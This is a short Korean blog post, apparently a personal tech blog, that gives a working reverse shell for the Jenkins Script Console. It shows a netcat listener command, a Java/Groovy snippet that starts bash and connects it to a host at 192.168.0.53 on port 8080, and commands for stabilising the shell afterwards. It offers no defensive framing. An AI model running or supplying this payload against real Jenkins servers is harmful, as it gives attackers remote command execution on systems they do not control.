공격자
nc -lvp 8080
Jenkins Script Console(Agent Host)
String host="192.168.0.53";
int port=8080;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
세션연결 후 안정적인 세션유지를 위한 명령어 수행
script /dev/null -c bash
Ctrl+Z 후 타이핑 하여 다시 세션 진입
- 자동완성 됨
stty raw -echo;fg
'기타정보' 카테고리의 다른 글
[정보] 부동산 한 줄 비유 (0) | 2024.02.02 |
---|---|
[정보] ipv4 고갈에 따른 고찰 (0) | 2024.02.02 |
[정보] AWS Saving Plan 구독 즉시 시간 당 비용 발생(EC2 미사용 포함) (0) | 2024.01.29 |
MSA로의 이전 (1) | 2024.01.28 |
[정보] pv pvc 트러블슈팅 (0) | 2024.01.26 |